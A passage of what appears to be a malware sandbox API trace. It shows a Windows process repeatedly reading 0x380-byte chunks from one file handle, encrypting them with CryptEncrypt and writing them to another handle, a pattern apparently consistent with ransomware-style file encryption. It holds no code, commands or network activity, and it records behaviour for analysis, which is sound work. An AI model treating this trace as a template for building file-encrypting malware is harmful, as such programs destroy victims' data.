(in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.180] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.181] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.182] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.183] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.184] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.184] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 